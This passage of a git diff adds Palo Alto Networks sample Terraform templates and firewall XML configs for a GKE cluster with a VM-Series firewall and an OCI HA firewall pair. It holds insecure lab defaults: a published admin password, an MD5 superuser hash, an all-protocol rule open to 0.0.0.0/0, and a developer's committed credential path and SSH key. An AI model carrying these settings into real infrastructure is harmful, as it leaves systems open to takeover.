+resource "google_compute_firewall" "allow-outbound" {
+  name    = "allow-outbound"
+  network = "${google_compute_network.trust.self_link}"
+
+  allow {
+    protocol = "all"
+
+    # ports    = ["all"]
+  }
+
+  source_ranges = ["0.0.0.0/0"]
+}
+
+// Create a new Palo Alto Networks NGFW VM-Series GCE instance
+resource "google_compute_instance" "firewall" {
+  name                      = "${var.firewall_name}-${count.index + 1}"
+  machine_type              = "${var.machine_type_fw}"
+  zone                      = "${var.zone}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  count                     = 1
+
+  // Adding METADATA Key Value pairs to VM-Series GCE instance
+  metadata {
+    vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket_fw}"
+    serial-port-enable                   = true
+
+    #sshKeys                              = "${var.public_key}"
+  }
+
+  service_account {
+    scopes = "${var.scopes_fw}"
+  }
+
+  network_interface {
+    subnetwork = "${google_compute_subnetwork.management-sub.self_link}"
+    network_ip = "10.5.0.4"
+
+    //address       = "10.5.0.4"
+    access_config = {}
+  }
+
+  network_interface {
+    subnetwork = "${google_compute_subnetwork.untrust-sub.self_link}"
+
+    network_ip    = "10.5.1.4"
+    access_config = {}
+  }
+
+  network_interface {
+    subnetwork = "${google_compute_subnetwork.trust-sub.self_link}"
+
+    network_ip = "10.5.2.100"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.image_fw}"
+    }
+  }
+
+  depends_on = [
+    "google_compute_network.trust",
+    "google_compute_subnetwork.trust-sub",
+  ]
+}
+
+//Create a K8s cluster
+resource "google_container_cluster" "cluster" {
+  name                    = "cluster-1"
+  zone                    = "${var.zone}"
+  min_master_version      = "${var.container-ver}"
+  initial_node_count      = 2
+  enable_kubernetes_alpha = true
+  cluster_ipv4_cidr       = "10.16.0.0/14"
+  logging_service         = "none"
+  monitoring_service      = "none"
+  network                 = "${google_compute_network.trust.self_link}"
+  subnetwork              = "${google_compute_subnetwork.trust-sub.self_link}"
+
+  maintenance_policy {
+    daily_maintenance_window {
+      start_time = "03:00"
+    }
+  }
+
+  addons_config {
+    http_load_balancing {
+      disabled = false
+    }
+
+    horizontal_pod_autoscaling {
+      disabled = false
+    }
+  }
+
+  node_config {
+    disk_size_gb = "32"
+    image_type   = "COS"
+    machine_type = "n1-standard-1"
+    preemptible  = false
+    oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"]
+
+    labels {
+      pool    = "web-pool"
+      cluster = "the-cluster"
+    }
+
+    tags = ["the-cluster", "gke-node", "web-tier"]
+  }
+
+  lifecycle {
+    create_before_destroy = true
+  }
+
+  depends_on = [
+    "google_compute_network.trust",
+    "google_compute_subnetwork.trust-sub",
+    "google_compute_instance.firewall",
+  ]
+}
+
+resource "google_container_node_pool" "db_nodes" {
+  name       = "db-node-pool"
+  region     = "${var.zone}"
+  cluster    = "${google_container_cluster.cluster.name}"
+  node_count = 2
+
+  node_config {
+    disk_size_gb = "32"
+    image_type   = "COS"
+    machine_type = "n1-standard-1"
+    preemptible  = false
+    oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"]
+
+    labels {
+      pool    = "db-pool"
+      cluster = "the-cluster"
+    }
+
+    tags = ["the-cluster", "gke-node", "db-tier"]
+  }
+
+  lifecycle {
+    create_before_destroy = true
+  }
+
+  depends_on = [
+    "google_compute_network.trust",
+    "google_compute_subnetwork.trust-sub",
+    "google_compute_instance.firewall",
+    "google_container_cluster.cluster",
+  ]
+}
+
+// Adding GCP Route to Node instances
+resource "google_compute_route" "gke-node0" {
+  name                   = "gke-node0"
+  dest_range             = "10.16.0.0/24"
+  network                = "${google_compute_network.trust.self_link}"
+  next_hop_instance      = "${element(google_compute_instance.firewall.*.name,count.index)}"
+  next_hop_instance_zone = "${var.zone}"
+  priority               = 10
+  tags                   = ["db-tier"]
+
+  depends_on = ["google_compute_instance.firewall",
+    "google_compute_network.trust",
+    "google_compute_network.untrust",
+    "google_compute_network.management",
+    "google_container_cluster.cluster",
+  ]
+}
+
+resource "google_compute_route" "gke-node1" {
+  name                   = "gke-node1"
+  dest_range             = "10.16.1.0/24"
+  network                = "${google_compute_network.trust.self_link}"
+  next_hop_instance      = "${element(google_compute_instance.firewall.*.name,count.index)}"
+  next_hop_instance_zone = "${var.zone}"
+  priority               = 10
+  tags                   = ["db-tier"]
+
+  depends_on = ["google_compute_instance.firewall",
+    "google_compute_network.trust",
+    "google_compute_network.untrust",
+    "google_compute_network.management",
+    "google_container_cluster.cluster",
+  ]
+}
+
+resource "google_compute_route" "gke-node2" {
+  name                   = "gke-node2"
+  dest_range             = "10.16.2.0/24"
+  network                = "${google_compute_network.trust.self_link}"
+  next_hop_instance      = "${element(google_compute_instance.firewall.*.name,count.index)}"
+  next_hop_instance_zone = "${var.zone}"
+  priority               = 10
+  tags                   = ["web-tier"]
+
+  depends_on = ["google_compute_instance.firewall",
+    "google_compute_network.trust",
+    "google_compute_network.untrust",
+    "google_compute_network.management",
+    "google_container_cluster.cluster",
+  ]
+}
+
+resource "google_compute_route" "gke-node3" {
+  name                   = "gke-node3"
+  dest_range             = "10.16.3.0/24"
+  network                = "${google_compute_network.trust.self_link}"
+  next_hop_instance      = "${element(google_compute_instance.firewall.*.name,count.index)}"
+  next_hop_instance_zone = "${var.zone}"
+  priority               = 10
+  tags                   = ["web-tier"]
+
+  depends_on = ["google_compute_instance.firewall",
+    "google_compute_network.trust",
+    "google_compute_network.untrust",
+    "google_compute_network.management",
+    "google_container_cluster.cluster",
+  ]
+}
+
+output "pan-tf-name" {
+  value = "${google_compute_instance.firewall.*.name}"
+}
+
+output "k8s-cluster-name" {
+  value = "${google_container_cluster.cluster.*.name}"
+}
+
+output "k8s-cluster-endpoint" {
+  value = "${google_container_cluster.cluster.*.endpoint}"
+}
+
+output "k8s-cluster_ipv4_cidr" {
+  value = "${google_container_cluster.cluster.*.cluster_ipv4_cidr}"
+}
diff --git a/gcp/k8s-Prisma-API/README.md b/gcp/k8s-Prisma-API/README.md
new file mode 100644
index 00000000..ccfbe6c9
--- /dev/null
+++ b/gcp/k8s-Prisma-API/README.md
@@ -0,0 +1,2 @@
+# k8s-terraform-skillet
+This Repository Holds the Terraform template in a PANW Skillet format to deploy a GKE K8s cluster that supports E/W inspection.
diff --git a/gcp/k8s-Prisma-API/Variables.tf b/gcp/k8s-Prisma-API/Variables.tf
new file mode 100644
index 00000000..fdb1944c
--- /dev/null
+++ b/gcp/k8s-Prisma-API/Variables.tf
@@ -0,0 +1,72 @@
+// PROJECT Variables
+variable "container-ver" {
+  default = "1.11.8-gke.6"
+}
+
+variable "my_gcp_project" {
+  default = "djs-gcp-2018"
+}
+
+variable "region" {
+  default = "us-central1"
+}
+
+variable "zone" {
+  default = "us-central1-a"
+}
+
+variable "credentials_file_path" {
+  description = "Path to the JSON file used to describe your account credentials"
+  default     = "/Users/dspears/GCP/k8-test/djs-gcp-2018-creds.json"
+}
+
+variable "gce_ssh_user" {
+  description = " ssh user that is used in the public key"
+  default     = "dspears@SJCMAC3024G8WL"
+}
+
+variable "gce_ssh_pub_key" {
+  description = " ssh key in the format:  ssh-rsa <key> username "
+  default     = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bjwWN/LY87FOZH/uuRXS5ku3OXkxsFIvecXMNDoeTNZU5QSM3bAV8t/IU52GsdQO+f2hv9iVulMfYPwxsMcVen32q+t6dcgtChUXPSk+giGqf71iR2xiqGdk6GgC705SUXG/AX1whNI1qT84wP0nOrJaoGo/SZq4Ryel9mptu1Ifj1vMphyw2WOFOMB3IuUYckZHgwbQxZK4iCGJSZmzP+M03oSKZATwvuI1XXUIUVTCcV45NofgCW3Ocfk0UjhK01l1SO3H4+c+v40Zufpqo4vPMOQajTggygpJ7SRCgOYWJxcdx4cr9ASNteii5LQFqAixJD0+0izXfQEUm0/T dspears@SJCMAC3024G8WL"
+}
+
+//The rest of the variables do not need to be modified for the K8s Lab
+// VM-Series Firewall Variables
+
+variable "firewall_name" {
+  default = "firewall"
+}
+
+variable "image_fw" {
+  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-810"
+
+  //default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810"
+}
+
+variable "machine_type_fw" {
+  default = "n1-standard-4"
+}
+
+variable "bootstrap_bucket_fw" {
+  default = "k8-ew"
+}
+
+variable "interface_0_name" {
+  default = "management"
+}
+
+variable "interface_1_name" {
+  default = "untrust"
+}
+
+variable "interface_2_name" {
+  default = "trust"
+}
+
+variable "scopes_fw" {
+  default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
diff --git a/oci/HA/OCI HA deployment guide.pdf b/oci/HA/OCI HA deployment guide.pdf
new file mode 100644
index 00000000..d41da875
Binary files /dev/null and b/oci/HA/OCI HA deployment guide.pdf differ
diff --git a/oci/HA/OCI-HA.png b/oci/HA/OCI-HA.png
new file mode 100644
index 00000000..128459fc
Binary files /dev/null and b/oci/HA/OCI-HA.png differ
diff --git a/oci/HA/README.md b/oci/HA/README.md
new file mode 100644
index 00000000..3928a15c
--- /dev/null
+++ b/oci/HA/README.md
@@ -0,0 +1,32 @@
+# Sample HA deployment for OCI
+
+Terraform creates:
+- A single compartment to house all infrastructure
+- A VCN with 5 regional subnets (management, untrust, trust, ha2, web)
+- 2 VM-Series firewalls in separate Availability Domains (ADs)
+- A test server
+- OCI Dynamic Groups and Policies for secondary IP address management
+
+HA in OCI works by moving secondary IP addresses from the down FW to the newly-active one. This is accomplished by the VM-Series plugin avilable beginning with PANOS 9.1.1 in OCI.
+
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/oci/HA/OCI-HA.png">
+</p> 
+
+Prior to deployment, update terraform.tfvars with the following information:
+- tenancy_ocid - The OCID of the target tenancy
+- user_ocid - The OCID of the user deploying the infrastructure
+- fingerprint - The fingerprint associated with the user's API key
+- private_key_path - The absolute path to the PEM-formatted private SSH key for the user
+- parent_compartment_ocid - The OCID of the parent/root compartment
+- ssh_authorized_key - The public SSH key for the user (format = "ssh-rsa <key> <username>")
+- fw_mgmt_src_ip - The IP or subnet authorized to connect to the FW post-deployment
+
+By default, the deployment is into us-ashburn-1. This may be altered by changing the relevant variables in terraform.tfvars.
+
+The folder fw-configs contains sample configuration files for the FW. These configuration files have HA pre-configured, allow SSH access to the server, and permit all outbound access to the internet. The username is 'admin' and the password is 'Pal0Alt0@123', which should be changed immediately.
+
+## Support Policy
+These files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/oci/HA/compartment.tf b/oci/HA/compartment.tf
new file mode 100644
index 00000000..0b053323
--- /dev/null
+++ b/oci/HA/compartment.tf
@@ -0,0 +1,6 @@
+resource "oci_identity_compartment" "compartment" {
+  compartment_id = "${var.parent_compartment_ocid}"
+  name           = "${var.compartment_name}"
+  description    = "compartment created by terraform"
+  enable_delete  = true
+}
\ No newline at end of file
diff --git a/oci/HA/firewalls.tf b/oci/HA/firewalls.tf
new file mode 100644
index 00000000..2496016e
--- /dev/null
+++ b/oci/HA/firewalls.tf
@@ -0,0 +1,60 @@
+resource "oci_core_instance" "firewall1" {
+  availability_domain = "${var.fw1_availability_domain}"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  display_name        = "FW-A"
+  shape               = "${var.fw_shape_size}"
+
+  create_vnic_details {
+    subnet_id               = "${oci_core_subnet.management.id}"
+    private_ip              = "${var.fw1_management_ip}"
+    display_name            = "management"
+    assign_public_ip        = true
+    skip_source_dest_check  = false
+    #nsg_ids                 = ["${oci_core_network_security_group.management.id}"]
+  }
+
+  source_details {
+    source_type             = "image"
+    source_id               = "${var.fw_ocid}"
+    boot_volume_size_in_gbs = "60"
+  }
+  preserve_boot_volume = false
+
+  metadata = {
+    ssh_authorized_keys = "${var.ssh_authorized_key}"
+#    user_data           = "${base64encode(file("./userdata/bootstrap"))}"
+  }
+  timeouts {
+    create = "60m"
+  }
+}
+resource "oci_core_instance" "firewall2" {
+  availability_domain = "${var.fw2_availability_domain}"
+  compartment_id      = "${oci_identity_compartment.compartment.id}"
+  display_name        = "FW-B"
+  shape               = "${var.fw_shape_size}"
+
+  create_vnic_details {
+    subnet_id               = "${oci_core_subnet.management.id}"
+    private_ip              = "${var.fw2_management_ip}"
+    display_name            = "management"
+    assign_public_ip        = true
+    skip_source_dest_check  = false
+    #nsg_ids                 = ["${oci_core_network_security_group.management.id}"]
+  }
+
+  source_details {
+    source_type             = "image"
+    source_id               = "${var.fw_ocid}"
+    boot_volume_size_in_gbs = "60"
+  }
+  preserve_boot_volume = false
+
+  metadata = {
+    ssh_authorized_keys = "${var.ssh_authorized_key}"
+#    user_data           = "${base64encode(file("./userdata/bootstrap"))}"
+  }
+  timeouts {
+    create = "60m"
+  }
+}
\ No newline at end of file
diff --git a/oci/HA/fw-configs/HA-FWA.xml b/oci/HA/fw-configs/HA-FWA.xml
new file mode 100644
index 00000000..ae6c5c2d
--- /dev/null
+++ b/oci/HA/fw-configs/HA-FWA.xml
@@ -0,0 +1,623 @@
+<?xml version="1.0"?>
+<config version="9.1.0" urldb="paloaltonetworks">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$xeppcrov$vOPkvdPeYIsmcsGromCxB0</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+      </entry>
+    </users>
+    <password-complexity>
+      <enabled>yes</enabled>
+      <minimum-length>8</minimum-length>
+    </password-complexity>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <ip>
+                  <entry name="192.168.1.100/24"/>
+                </ip>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <ip>
+                  <entry name="192.168.2.100/24"/>
+                </ip>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/3">
+              <ha/>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway/>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class-bandwidth-type>
+                <mbps>
+                  <class>
+                    <entry name="class1">
+                      <priority>real-time</priority>
+                    </entry>
+                    <entry name="class2">
+                      <priority>high</priority>
+                    </entry>
+                    <entry name="class3">
+                      <priority>high</priority>
+                    </entry>
+                    <entry name="class4">
+                      <priority>medium</priority>
+                    </entry>
+                    <entry name="class5">
+                      <priority>medium</priority>
+                    </entry>
+                    <entry name="class6">
+                      <priority>low</priority>
+                    </entry>
+                    <entry name="class7">
+                      <priority>low</priority>
+                    </entry>
+                    <entry name="class8">
+                      <priority>low</priority>
+                    </entry>
+                  </class>
+                </mbps>
+              </class-bandwidth-type>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="webservers">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>192.168.101.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+          <global-protect-gateway/>
+          <global-protect-site-to-site/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <static/>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FWA</hostname>
+          <ip-address>192.168.0.11</ip-address>
+          <netmask>255.255.255.0</netmask>
+          <default-gateway>192.168.0.1</default-gateway>
+          <dns-setting>
+            <servers>
+              <primary>169.254.169.254</primary>
+              <secondary>8.8.8.8</secondary>
+            </servers>
+          </dns-setting>
+          <ntp-servers>
+            <primary-ntp-server>
+              <ntp-server-address>us.pool.ntp.org</ntp-server-address>
+              <authentication-type>
+                <none/>
+              </authentication-type>
+            </primary-ntp-server>
+            <secondary-ntp-server>
+              <ntp-server-address>pool.ntp.org</ntp-server-address>
+              <authentication-type>
+                <none/>
+              </authentication-type>
+            </secondary-ntp-server>
+          </ntp-servers>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+            </initcfg>
+          </management>
+          <auto-mac-detect>yes</auto-mac-detect>
+        </setting>
+        <high-availability>
+          <interface>
+            <ha1>
+              <port>management</port>
+            </ha1>
+            <ha1-backup/>
+            <ha2>
+              <port>ethernet1/3</port>
+              <ip-address>192.168.30.101</ip-address>
+              <netmask>255.255.255.0</netmask>
+              <gateway>192.168.30.1</gateway>
+            </ha2>
+          </interface>
+          <group>
+            <group-id>1</group-id>
+            <peer-ip>192.168.0.12</peer-ip>
+            <state-synchronization>
+              <transport>ip</transport>
+            </state-synchronization>
+            <election-option>
+              <device-priority>101</device-priority>
+              <timers>
+                <recommended/>
+              </timers>
+            </election-option>
+            <mode>
+              <active-passive>
+                <passive-link-state>auto</passive-link-state>
+              </active-passive>
+            </mode>
+          </group>
+          <enabled>yes</enabled>
+        </high-availability>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <nat>
+              <rules>
+                <entry name="Inbound to web1" uuid="f113f416-bc15-4679-b8c8-b7fe7d3e5adb">
+                  <dynamic-destination-translation>
+                    <translated-address>web1</translated-address>
+                  </dynamic-destination-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>any</to-interface>
+                </entry>
+                <entry name="Outbound to Internet" uuid="30c30932-c075-4093-9cb5-a8a4e9decfd3">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <translated-address>
+                        <member>fw-untrust</member>
+                      </translated-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <security>
+              <rules>
+                <entry name="Inbound to web1" uuid="92a029fa-0138-4961-a331-fe3d16d6e70b">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>ssh</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="Outbound to Internet" uuid="6fa9b8d8-e523-4907-afce-88f6230a1596">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="5115e93d-d7d3-4030-9ee6-ddd15a71854a">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default" uuid="7d39b7cd-32d0-478a-8b7b-b533fb635aeb">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="web1">
+              <ip-netmask>192.168.101.2</ip-netmask>
+            </entry>
+            <entry name="fw-untrust">
+              <ip-netmask>192.168.1.100</ip-netmask>
+            </entry>
+          </address>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/oci/HA/fw-configs/HA-FWB.xml b/oci/HA/fw-configs/HA-FWB.xml
new file mode 100644
index 00000000..6b5d41ce
--- /dev/null
+++ b/oci/HA/fw-configs/HA-FWB.xml
@@ -0,0 +1,623 @@
+<?xml version="1.0"?>
+<config version="9.1.0" urldb="paloaltonetworks">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$xeppcrov$vOPkvdPeYIsmcsGromCxB0</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
